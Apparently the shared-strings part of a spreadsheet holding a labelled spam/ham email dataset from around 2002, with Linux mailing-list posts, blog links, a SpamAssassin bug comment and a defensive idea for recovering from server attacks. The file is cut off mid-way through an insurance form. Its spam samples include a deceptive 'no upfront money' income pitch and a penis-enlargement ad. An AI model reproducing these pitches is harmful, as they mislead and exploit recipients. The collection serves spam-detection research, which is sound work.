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rain" sheetId="1" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="0" name="_xlnm._FilterDatabase">train!$D$1:$D$8351</definedName>
  </definedNames>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="16623" uniqueCount="9855">
  <si>
    <t>id</t>
  </si>
  <si>
    <t>subject</t>
  </si>
  <si>
    <t>email</t>
  </si>
  <si>
    <t>spam</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A&amp;L Daily to be auctioned in bankruptcy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534171
 Date: Not supplied
 Arts and Letters Daily, a wonderful and dense blog, has folded up its tent due 
 to the bankruptcy of its parent company. A&amp;L Daily will be auctioned off by the 
 receivers. Link[1] Discuss[2] (_Thanks, Misha!_)
 [1] http://www.aldaily.com/
 [2] http://www.quicktopic.com/boing/H/ZLfTeRjnD6Jf
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wired: "Stronger ties between ISPs and file-trading companies
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:33:10AM
 Date: Wed, 25 Sep 2002 15:33:10 GMT
 Wired[1]: "Stronger ties between ISPs and file-trading companies could bolster 
 Kazaa's defenses."
 [1] http://www.wired.com/news/mp3/0,1285,55356,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: It's just too small                    HLOY
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;FONT SIZE=3D"4"&gt;&lt;B&gt; A man endowed with a 7-8" hammer is simply&lt;br&gt;
  better equipped than a man with a 5-6"hammer. &lt;BR&gt;
 &lt;BR&gt;Would you rather have&lt;br&gt;more than enough to get the job done or fall =
 short. It's totally up&lt;br&gt;to you. Our Methods are guaranteed to increase y=
 our size by 1-3"&lt;br&gt; &lt;A HREF=3D"http://209.163.187.47/cgi-bin/index.php?10=
 004"&gt;Come in here and see how&lt;/A&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: liberal defnitions
</t>
  </si>
  <si>
    <t xml:space="preserve">Depends on how much over spending vs. how much (and what type) over
 regulation.
 The biggest problem with over regulation is the costs can be invisible.
 It also has the ability to single out particular people, while over
 spending spreads the damage more evenly.  Rent control would be an
 example of a regulation solution that is in general worse than spending
 tons of money on public housing.
 As for the definition of a liberal being someone who seeks to impose
 both, I find no fault in that definition whatsoever.  The opinion that
 EITHER we are spending too much OR we have too much regulation is pretty
 much anathema to liberal politics.
 Finally, those who argue that there are private replacements for much
 government regulation are not saying that a state of nature (no private
 replacements, no government regulation) is better than government
 regulation itself.
 And in my experience people who label themselves 'Green' (which does not
 include everyone who loves trees and thinks smokestacks are ugly) is a
 watermelon.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; 
 &gt; funny. i read it as green = red, as in accounting, as in fiscally
 &gt; irresponsible.  which do you think is the worse indictment -
 &gt; overregulation
 &gt; or overspending?  there are many (dickheads) who buy into the
 &gt; neo-conservative media's (fox's) definiton of "liberal" as "one who
 seeks
 &gt; to
 &gt; impose both."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Newbie seeks advice - Suse 7.2
</t>
  </si>
  <si>
    <t xml:space="preserve">hehe sorry but if you hit caps lock twice the computer crashes?  theres one
 ive never heard before... have you tryed Dell support yet? I think dell
 computers prefer RedHat... (dell provide some computers pre-loaded with red
 hat) i dont know for sure tho! so get someone elses opnion as well as
 mine...
 -----Original Message-----
 From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of Peter
 Staunton
 Sent: 22 August 2002 19:58
 To: ilug@linux.ie
 Subject: [ILUG] Newbie seeks advice - Suse 7.2
 Folks,
 my first time posting - have a bit of Unix experience, but am new to Linux.
 Just got a new PC at home - Dell box with Windows XP. Added a second hard
 disk
 for Linux. Partitioned the disk and have installed Suse 7.2 from CD, which
 went
 fine except it didn't pick up my monitor.
 I have a Dell branded E151FPp 15" LCD flat panel monitor and a nVidia
 GeForce4
 Ti4200 video card, both of which are probably too new to feature in Suse's
 default
 set. I downloaded a driver from the nVidia website and installed it using
 RPM.
 Then I ran Sax2 (as was recommended in some postings I found on the net),
 but
 it still doesn't feature my video card in the available list. What next?
 Another problem. I have a Dell branded keyboard and if I hit Caps-Lock
 twice,
 the whole machine crashes (in Linux, not Windows) - even the on/off switch
 is
 inactive, leaving me to reach for the power cable instead.
 If anyone can help me in any way with these probs., I'd be really grateful -
 I've searched the 'net but have run out of ideas.
 Or should I be going for a different version of Linux such as RedHat?
 Opinions
 welcome.
 Thanks a lot,
 Peter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</si>
  <si>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Five
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/09.html#five
 Date: 2002-10-09T10:25:09-05:00
 - _OSNews.com_: Red Hat 8.0 for KDE Users (and Newbies)[1]. 
 - _Aaron Swartz_: Trip notes[2]. 
 - _Sean Palmer_: The Semantic Web in Haiku[3]. 
 - _Shelley Powers_: The Parable of the Languages[4]. 
 - _Heather Hamilton_: You only get five[5]. (Mira Sorvino[6], Portia de Rossi
 [7], Stockard Channing[8], Jeri Ryan[9] Nigella Lawson[10], and Angelina Jolie
 [11]. D gave me her list but wouldn't let me post it. Meh.) 
 [1]  http://www.osnews.com/story.php?news_id=1890
 [2]  http://www.aaronsw.com/weblog/000647
 [3]  http://infomesh.net/2002/swhaiku/
 [4]  http://weblog.burningbird.net/archives/000581.php
 [5]  http://www.dooce.com/mtarchives/10_08_2002.html
 [6]  http://www.elegantwomen.net/mirasorvino/009.html
 [7]  http://www.safesearching.com/portiaderossi/gallery/
 [8]  http://images.amazon.com/images/P/0792846486.01.LZZZZZZZ.jpg
 [9]  http://www.elegantwomen.net/jeriryan/003.html
 [10] http://www.stylenetwork.com/Shows/Nigella/Gallery/index.html
 [11] http://www.elegantwomen.net/angelinajolie/009.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1006] Spamassassin's build process makes packaging
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1006
 jm@jmason.org changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |ASSIGNED
 ------- Additional Comments From jm@jmason.org  2002-10-03 13:29 -------
 1. Use of $Config is gradually being removed, thankfully.  I don't want
 to see any of that stuff in there if it acn be avoided, as different
 perl versions jsut vary so much in that stuff.
 2. perl has no concept of where the rules could be -- unless they're in
 the perl libdir (/usr/lib/perl5/site_perl/5.x.x/foo).  Perl does not
 know about the existence of /usr/share or /etc.  Used to use /usr/lib/perl5
 for storing rules, and it was actually *much worse* than it is now. So
 we need an out-of-band way to tell SA where to find this stuff. that's
 the problem!
 3. try "perl Makefile.PL &lt; /dev/null" to allow bots to build it.
 I think I might be missing some details of what you're peeved about,
 though... could you elaborate specifically?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</si>
  <si>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One of a kind Money maker! Try it for free!
</t>
  </si>
  <si>
    <t xml:space="preserve">------000000000000000000000
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;body lang=EN-US&gt;
 &lt;div class=Section1&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;&lt;b&gt;CONSANTLY&lt;/b&gt; being
 bombarded by so-called FREE money-making systems that teases you with limited
 information, and when its all said and done, blind-sides you by demanding your
 money/credit card information upfront in some slick way,&lt;b&gt; after-the-fact&lt;/b&gt;!
 Yes, I too was as skeptical about such offers and the Internet in general with
 all its hype, as you probably are. Fortunate for me, my main business
 slowed-down (&lt;i&gt;I have been self-employed all my life&lt;/i&gt;), so I looked for
 something to fit my lifestyle and some other way to assist me in paying my
 bills, without working myself to death or loosing more money; then, this
 proposal to try something new without any upfront investment (&lt;i&gt;great! because
 I had none&lt;/i&gt;) interested me to click on the link provided. And I dont regret
 at all that I did! I am very happy, and happy enough to recommend it to you as
 a system that is true to its word. I mean absolutely no upfront money. You join
 only if (&lt;i&gt;when&lt;/i&gt;) you make money. You also get to track the results of your
 time and efforts instantly and updated daily! I especially liked this idea of
 personal control with real-time, staying informed statistics.&lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;&lt;b&gt;This system is quite simply
 the most logical, opened, and fair of any others that Ive seen before. Why?
 Because from the start, you get all the specific facts you need to seriously
 consider if this is right for you. No teasing. No grand testimonies! No
 kidding! Just the facts! Unlike in other programs that give you no idea of
 their overall plan before first forking over your money/credit card; or worst
 yet, joining and finding-out too late, after wasting valuable time trying to
 figure them out, this system is straightforward and informative, providing you
 with the two things you really must know: &lt;u&gt;Whats it all about&lt;/u&gt;? and &lt;u&gt;How
 does it work&lt;/u&gt;?. These are the ultimate deal makers or deal breakers that
 need to be immediately disclosed, well before discovering that maybe you dont
 want to do that; by then you are hooked and now locked into a frustrating
 battle to try to get your money back! &lt;/b&gt;&lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;I call this my Platinum
 Choice because it stands alone as a true, superior deal that is totally
 different from previously misleading, hook-first programs that promise lofty
 mega-money jackpots, but really just want your money upfront to line their own
 pockets! Youve seen the headlines: &lt;u&gt;Join free and Make $10,000 every week
 for life&lt;/u&gt; yeah, right!&lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;I did not make millions yet,
 but the whole thing was launched just a few weeks ago and I am more than happy
 with my earnings, so far. I must tell you, I wouldnt be able to do anything
 without corporate help  which was unusually thorough, timely, and motivating. &lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;You have to see this in action
 for yourself and make up your own mind; just go to my site and fill out the
 form as soon as you can. You will get your own site in a few minutes. Then you
 are ready to try whether you can make some decent money with this system and
 the Internets explosive potential - fully loaded with hi-tech software, free
 corporate help, on-time members support and even protective safeguards! &lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;Get it now, and you can call me
 at any time with questions. It really could help you like it is helping me to
 finally be able to pay my bills, and keep my free time free. Good luck!&lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;&lt;a
 href="http://www.mindupmerchants.com/default.asp?ID=5581"&gt;http://www.mindupmerchants.com/default.asp?ID=5581&lt;/a&gt;&lt;/p&gt;
 &lt;p class=MsoBodyText style='text-align:justify'&gt;Ben Green, (775) 322-3323 &lt;/p&gt;
 &lt;p class=MsoBodyText&gt;P.S.Free POP3 email is ofered for members now!&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 ------000000000000000000000--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: freshrpms.net resources (was Re: use new apt to do null to RH8
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt;    Yeah, but I try to 'take it easy' on your server.  The golden rule of
 &gt;    the internet: when you find a free resource, don't piss'em off!  :)  I
 &gt;    really appreciate your work; you get done the things I wish I could,
 &gt;    and I respect that.
 Don't worry too much : The day the server gets too busy, I'll cleanup and
 publish the addresses of some mirrors, as many ftp mirrors exist (I'm aware
 of at least 15), and even an apt one :-)
 For now, the limit is far enough : When I unlocked the Psyche ISO images on
 Monday, the bandwidth usage on the current (ftp|http|rsync) freshrpms.net
 server went up to 90Mbps sustained, which is not bad as the server has a
 100Mbps physical NIC! Of course, I'd get in trouble if it was always like
 that, but the average used when no new Red Hat release is there is between
 2 and 4Mbps, which my company tolerates, as I've convinced them it's a
 useful return to the community providing us the great operating system all
 our servers are running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</si>
  <si>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use of base image / delta image for automated recovery from attacks
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I was inspired by a mode of operation supported by VMWare. You can have a
 base disk image shared by multiple virtual machine (vm) instances. That base
 image is never altered by a vm instance. Instead, each vm instance writes
 changes to its own "redo" log. Future hard disk reads from that vm instance
 incorporate both the base image and the appropriate redo log to present the
 current disk image for that specific virtual machine.
 This is described here (thanks to Duane for providing this link on the
 honeypots mailing list)
 http://www.vmware.com/support/reference/common/disk_sharing.html
 Could this basic concept be used to easily make self-fixing client/server
 applications that efficiently and automatically recover from most attacks,
 even before those attacks have been discovered? Here is what I imagine.
 The physical architectures of most production client/server systems are
 layered. For example, your basic web application might have a web server
 running Apache, connected to an application server running some J2EE or .Net
 business logic, connected to a database server for persistence. The only one
 of these whose disk image really should evolve over time is the database
 server, and even here you often put the static RDBMS software on one
 partition and the changeable datafiles on another partition. It is only the
 partition with the volatile datafiles that must be allowed to change from
 one boot to the next. Other paritions may need to be writable for, say, swap
 space, but these changes could be eliminated on each reboot.
 When someone cracks this system, they will probably change an image that
 shouldn't be changed. E.g., they might leverage a buffer overflow in IIS or
 Apache to install a trojan or a backdoor on the more exposed web server. But
 what if the web server ran off a base image, writing changes to a "delta" or
 "redo" partition? And then what if every night it automatically erased the
 redo partition and rebooted? The downtime involved for each machine would be
 minimal, because it is only deleting data - rather than restoring from
 backup. In a system with redundant web servers for load balancing or high
 availability, this could be scheduled in a way such that the system is
 always accessible. This base/redo partition concept could be implemented at
 the same level as a feature of hardware RAID, allowing for greater
 performance, reliability, and hack resistance. This concept could also be
 applied to the application servers, and even the database server partitions
 (except for those partitions which contain the table data files, of course.)
 Does anyone do this already? Or is this a new concept? Or has this concept
 been discussed before and abandoned for some reasons that I don't yet know?
 I use the physical architecture of a basic web application as an example in
 this post, but this concept could of course be applied to most server
 systems. It would allow for the hardware-separation of volatile and
 non-volatile disk images. It would be analogous to performing nightly
 ghosting operations, only it would be more efficient and involve less (or
 no) downtime.
 Thanks for any opinions,
 Ben
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is Your Family Protected?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ReliaQuote - Save Up To 70% On Life Insurance&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body leftmargin="0" topmargin="0" link="#FFCC99" vlink="#FFCC99" alink="#FFCC00"&gt;
 &lt;table align="center" width="468" border="0" cellspacing="0" cellpadding="0" height="500" bgcolor="993366"&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top" height="43" width="56%"&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="3"&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=YUESBHWAKMLK&amp;ext=1" target="_blank"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/logo6.gif" width="120" height="32" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
     &lt;td align="left" valign="top" height="43" width="44%"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top" width="56%" height="377"&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr align="right" valign="top" bgcolor="#FFCCFF"&gt;
           &lt;td height="2"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/headline6.gif" width="220" height="72"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="center" valign="top" bgcolor="336699"&gt;
           &lt;td height="2"&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr align="center" valign="top"&gt;
                 &lt;td height="32"&gt;
                   &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
                     &lt;tr align="left" valign="top"&gt;
                       &lt;td height="34"&gt;
                         &lt;table width="100%" border="0" cellspacing="8" cellpadding="0" bgcolor="#993366"&gt;
                           &lt;tr align="center" valign="top"&gt;
                             &lt;td height="45"&gt;
                               &lt;p&gt;&lt;font color="#FFCC00" face="Tahoma, Verdana, Arial" size="2"&gt;&lt;b&gt;Life
                                 can change in an instant. That's why it is so
                                 important to protect your family's financial future
                                 with sufficient life insurance coverage.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                             &lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor="#FFCC00" align="center" valign="middle"&gt;
           &lt;td height="27"&gt;&lt;font size="1"&gt;&lt;b&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/freequotes6.gif" width="177" height="24"&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="left" valign="top" bgcolor="#3366CC"&gt;
           &lt;td height="294"&gt;
             &lt;form name=FreeQuoteForm ACTION="http://www.reliaquote.com/termlife/cgi-bin/banner_quote_resp.asp" METHOD="get"&gt;
  &lt;input type=hidden value=51100004022000000321 name=sourceid&gt;
               &lt;table class=hptbcolor cellspacing=0 cellpadding=2 width="100%"
         border=0&gt;
                 &lt;tbody&gt;
                 &lt;tr&gt;
                   &lt;td width="100%"&gt;
                     &lt;table cellspacing=4 cellpadding=0 width="100%" border=0&gt;
                       &lt;tbody&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;State
                           of Residence:&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td class=content width="65%" align="left" valign="middle"&gt;
                           &lt;font face="Tahoma, Verdana, Arial"&gt;
                           &lt;select id=FormsComboBox12
                   size=1 name=state&gt;
                             &lt;option value="" selected&gt;Select State&lt;/option&gt;
                             &lt;option value=Alabama&gt;Alabama&lt;/option&gt;
                             &lt;option value=Alaska&gt;Alaska&lt;/option&gt;
                             &lt;option
                     value=Arizona&gt;Arizona&lt;/option&gt;
                             &lt;option
                     value=Arkansas&gt;Arkansas&lt;/option&gt;
                             &lt;option
                     value=California&gt;California&lt;/option&gt;
                             &lt;option
                     value=Colorado&gt;Colorado&lt;/option&gt;
                             &lt;option
                     value=Connecticut&gt;Connecticut&lt;/option&gt;
                             &lt;option
                     value=Delaware&gt;Delaware&lt;/option&gt;
                             &lt;option value=DC&gt;Dist. of Columbia&lt;/option&gt;
                             &lt;option value=Florida&gt;Florida&lt;/option&gt;
                             &lt;option value=Georgia&gt;Georgia&lt;/option&gt;
                             &lt;option
                     value=Hawaii&gt;Hawaii&lt;/option&gt;
                             &lt;option
                     value=Idaho&gt;Idaho&lt;/option&gt;
                             &lt;option
                     value=Illinois&gt;Illinois&lt;/option&gt;
                             &lt;option
                     value=Indiana&gt;Indiana&lt;/option&gt;
                             &lt;option
                     value=Iowa&gt;Iowa&lt;/option&gt;
                             &lt;option
                     value=Kansas&gt;Kansas&lt;/option&gt;
                             &lt;option
                     value=Kentucky&gt;Kentucky&lt;/option&gt;
                             &lt;option
                     value=Louisiana&gt;Louisiana&lt;/option&gt;
                             &lt;option
                     value=Maine&gt;Maine&lt;/option&gt;
                             &lt;option
                     value=Maryland&gt;Maryland&lt;/option&gt;
                             &lt;option
                     value=Massachusetts&gt;Massachusetts&lt;/option&gt;
                             &lt;option
                     value=Michigan&gt;Michigan&lt;/option&gt;
                             &lt;option
                     value=Minnesota&gt;Minnesota&lt;/option&gt;
                             &lt;option
                     value=Mississippi&gt;Mississippi&lt;/option&gt;
                             &lt;option
                     value=Missouri&gt;Missouri&lt;/option&gt;
                             &lt;option
                     value=Montana&gt;Montana&lt;/option&gt;
                             &lt;option
                     value=Nebraska&gt;Nebraska&lt;/option&gt;
                             &lt;option
                     value=Nevada&gt;Nevada&lt;/option&gt;
                             &lt;option
                     value="New Hampshire"&gt;New Hampshire&lt;/option&gt;
                             &lt;option
                     value="New Jersey"&gt;New Jersey&lt;/option&gt;
                             &lt;option
                     value="New Mexico"&gt;New Mexico&lt;/option&gt;
                             &lt;option
                     value="New York"&gt;New York&lt;/option&gt;
                             &lt;option
                     value="North Carolina"&gt;North Carolina&lt;/option&gt;
                             &lt;option
                     value="North Dakota"&gt;North Dakota&lt;/option&gt;
                             &lt;option
                     value=Ohio&gt;Ohio&lt;/option&gt;
                             &lt;option
                     value=Oklahoma&gt;Oklahoma&lt;/option&gt;
                             &lt;option
                     value=Oregon&gt;Oregon&lt;/option&gt;
                             &lt;option
                     value=Pennsylvania&gt;Pennsylvania&lt;/option&gt;
                             &lt;option
                     value="Rhode Island"&gt;Rhode Island&lt;/option&gt;
                             &lt;option
                     value="South Carolina"&gt;South Carolina&lt;/option&gt;
                             &lt;option
                     value="South Dakota"&gt;South Dakota&lt;/option&gt;
                             &lt;option
                     value=Tennessee&gt;Tennessee&lt;/option&gt;
                             &lt;option
                     value=Texas&gt;Texas&lt;/option&gt;
                             &lt;option value=Utah&gt;Utah&lt;/option&gt;
                             &lt;option value=Vermont&gt;Vermont&lt;/option&gt;
                             &lt;option
                     value=Virginia&gt;Virginia&lt;/option&gt;
                             &lt;option
                     value=Washington&gt;Washington&lt;/option&gt;
                             &lt;option
                     value="West Virginia"&gt;West Virginia&lt;/option&gt;
                             &lt;option
                     value=Wisconsin&gt;Wisconsin&lt;/option&gt;
                             &lt;option
                     value=Wyoming&gt;Wyoming&lt;/option&gt;
                           &lt;/select&gt;
                           &lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;Date
                           of Birth (MM/DD/YY):&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td noWrap width="65%" align="left" valign="middle"&gt; &lt;font face="Tahoma, Verdana, Arial"&gt;
                           &lt;select size=1 name=MM&gt;
                             &lt;option
                     value="" selected&gt;MM&lt;/option&gt;
                             &lt;option value=01&gt;01&lt;/option&gt;
                             &lt;option value=02&gt;02&lt;/option&gt;
                             &lt;option value=03&gt;03&lt;/option&gt;
                             &lt;option value=04&gt;04&lt;/option&gt;
                             &lt;option value=05&gt;05&lt;/option&gt;
                             &lt;option value=06&gt;06&lt;/option&gt;
                             &lt;option value=07&gt;07&lt;/option&gt;
                             &lt;option value=08&gt;08&lt;/option&gt;
                             &lt;option value=09&gt;09&lt;/option&gt;
                             &lt;option value=10&gt;10&lt;/option&gt;
                             &lt;option value=11&gt;11&lt;/option&gt;
                             &lt;option value=12&gt;12&lt;/option&gt;
                           &lt;/select&gt;
                           /
                           &lt;select size=1 name=DD&gt;
                             &lt;option value="" selected&gt;DD&lt;/option&gt;
                             &lt;option
                     value=01&gt;01&lt;/option&gt;
                             &lt;option value=02&gt;02&lt;/option&gt;
                             &lt;option
                     value=03&gt;03&lt;/option&gt;
                             &lt;option value=04&gt;04&lt;/option&gt;
                             &lt;option
                     value=05&gt;05&lt;/option&gt;
                             &lt;option value=06&gt;06&lt;/option&gt;
                             &lt;option
                     value=07&gt;07&lt;/option&gt;
                             &lt;option value=08&gt;08&lt;/option&gt;
                             &lt;option
                     value=09&gt;09&lt;/option&gt;
                             &lt;option value=10&gt;10&lt;/option&gt;
                             &lt;option
                     value=11&gt;11&lt;/option&gt;
                             &lt;option value=12&gt;12&lt;/option&gt;
                             &lt;option
                     value=13&gt;13&lt;/option&gt;
                             &lt;option value=14&gt;14&lt;/option&gt;
                             &lt;option
                     value=15&gt;15&lt;/option&gt;
                             &lt;option value=16&gt;16&lt;/option&gt;
                             &lt;option
                     value=17&gt;17&lt;/option&gt;
                             &lt;option value=18&gt;18&lt;/option&gt;
                             &lt;option
                     value=19&gt;19&lt;/option&gt;
                             &lt;option value=20&gt;20&lt;/option&gt;
                             &lt;option
                     value=21&gt;21&lt;/option&gt;
                             &lt;option value=22&gt;22&lt;/option&gt;
                             &lt;option
                     value=23&gt;23&lt;/option&gt;
                             &lt;option value=24&gt;24&lt;/option&gt;
                             &lt;option
                     value=25&gt;25&lt;/option&gt;
                             &lt;option value=26&gt;26&lt;/option&gt;
                             &lt;option
                     value=27&gt;27&lt;/option&gt;
                             &lt;option value=28&gt;28&lt;/option&gt;
                             &lt;option
                     value=29&gt;29&lt;/option&gt;
                             &lt;option value=30&gt;30&lt;/option&gt;
                             &lt;option
                     value=31&gt;31&lt;/option&gt;
                           &lt;/select&gt;
                           /
                           &lt;select size=1 name=YY&gt;
                             &lt;option value="" selected&gt;YY&lt;/option&gt;
                             &lt;option
                     value=13&gt;13&lt;/option&gt;
                             &lt;option value=14&gt;14&lt;/option&gt;
                             &lt;option
                     value=15&gt;15&lt;/option&gt;
                             &lt;option value=16&gt;16&lt;/option&gt;
                             &lt;option
                     value=17&gt;17&lt;/option&gt;
                             &lt;option value=18&gt;18&lt;/option&gt;
                             &lt;option
                     value=19&gt;19&lt;/option&gt;
                             &lt;option value=20&gt;20&lt;/option&gt;
                             &lt;option
                     value=21&gt;21&lt;/option&gt;
                             &lt;option value=22&gt;22&lt;/option&gt;
                             &lt;option
                     value=23&gt;23&lt;/option&gt;
                             &lt;option value=24&gt;24&lt;/option&gt;
                             &lt;option
                     value=25&gt;25&lt;/option&gt;
                             &lt;option value=26&gt;26&lt;/option&gt;
                             &lt;option
                     value=27&gt;27&lt;/option&gt;
                             &lt;option value=28&gt;28&lt;/option&gt;
                             &lt;option
                     value=29&gt;29&lt;/option&gt;
                             &lt;option value=30&gt;30&lt;/option&gt;
                             &lt;option
                     value=31&gt;31&lt;/option&gt;
                             &lt;option value=32&gt;32&lt;/option&gt;
                             &lt;option
                     value=33&gt;33&lt;/option&gt;
                             &lt;option value=34&gt;34&lt;/option&gt;
                             &lt;option
                     value=35&gt;35&lt;/option&gt;
                             &lt;option value=36&gt;36&lt;/option&gt;
                             &lt;option
                     value=37&gt;37&lt;/option&gt;
                             &lt;option value=38&gt;38&lt;/option&gt;
                             &lt;option
                     value=39&gt;39&lt;/option&gt;
                             &lt;option value=40&gt;40&lt;/option&gt;
                             &lt;option
                     value=41&gt;41&lt;/option&gt;
                             &lt;option value=42&gt;42&lt;/option&gt;
                             &lt;option
                     value=43&gt;43&lt;/option&gt;
                             &lt;option value=44&gt;44&lt;/option&gt;
                             &lt;option
                     value=45&gt;45&lt;/option&gt;
                             &lt;option value=46&gt;46&lt;/option&gt;
                             &lt;option
                     value=47&gt;47&lt;/option&gt;
                             &lt;option value=48&gt;48&lt;/option&gt;
                             &lt;option
                     value=49&gt;49&lt;/option&gt;
                             &lt;option value=50&gt;50&lt;/option&gt;
                             &lt;option
                     value=51&gt;51&lt;/option&gt;
                             &lt;option value=52&gt;52&lt;/option&gt;
                             &lt;option
                     value=53&gt;53&lt;/option&gt;
                             &lt;option value=54&gt;54&lt;/option&gt;
                             &lt;option
                     value=55&gt;55&lt;/option&gt;
                             &lt;option value=56&gt;56&lt;/option&gt;
                             &lt;option
                     value=57&gt;57&lt;/option&gt;
                             &lt;option value=58&gt;58&lt;/option&gt;
                             &lt;option
                     value=59&gt;59&lt;/option&gt;
                             &lt;option value=60&gt;60&lt;/option&gt;
                             &lt;option
                     value=61&gt;61&lt;/option&gt;
                             &lt;option value=62&gt;62&lt;/option&gt;
                             &lt;option
                     value=63&gt;63&lt;/option&gt;
                             &lt;option value=64&gt;64&lt;/option&gt;
                             &lt;option
                     value=65&gt;65&lt;/option&gt;
                             &lt;option value=66&gt;66&lt;/option&gt;
                             &lt;option
                     value=67&gt;67&lt;/option&gt;
                             &lt;option value=68&gt;68&lt;/option&gt;
                             &lt;option
                     value=69&gt;69&lt;/option&gt;
                             &lt;option value=70&gt;70&lt;/option&gt;
                             &lt;option
                     value=71&gt;71&lt;/option&gt;
                             &lt;option value=72&gt;72&lt;/option&gt;
                             &lt;option
                     value=73&gt;73&lt;/option&gt;
                             &lt;option value=74&gt;74&lt;/option&gt;
                             &lt;option
                     value=75&gt;75&lt;/option&gt;
                             &lt;option value=76&gt;76&lt;/option&gt;
                             &lt;option
                     value=77&gt;77&lt;/option&gt;
                             &lt;option value=78&gt;78&lt;/option&gt;
                             &lt;option
                     value=79&gt;79&lt;/option&gt;
                             &lt;option value=80&gt;80&lt;/option&gt;
                             &lt;option
                     value=81&gt;81&lt;/option&gt;
                             &lt;option value=82&gt;82&lt;/option&gt;
                             &lt;option
                     value=83&gt;83&lt;/option&gt;
                                           &lt;option
                     value=84&gt;84&lt;/option&gt;
                           &lt;/select&gt;
                           &lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;Sex:&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td noWrap width="65%" align="left" valign="middle"&gt;
                           &lt;table cellspacing=0 width="100%" border=0&gt;
                             &lt;tbody&gt;
                             &lt;tr&gt;
                               &lt;td width="50%"&gt; &lt;font color="#FFFFFF" size="1" face="Tahoma, Verdana, Arial"&gt;&lt;b&gt;
                                 &lt;input id=FormsRadioButton1 type=radio
                         value=M name=Sex&gt;
                                 Male&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                               &lt;td width="50%"&gt; &lt;font color="#FFFFFF" size="1" face="Tahoma, Verdana, Arial"&gt;&lt;b&gt;
                                 &lt;input id=FormsRadioButton2 type=radio
                         value=F name=Sex&gt;
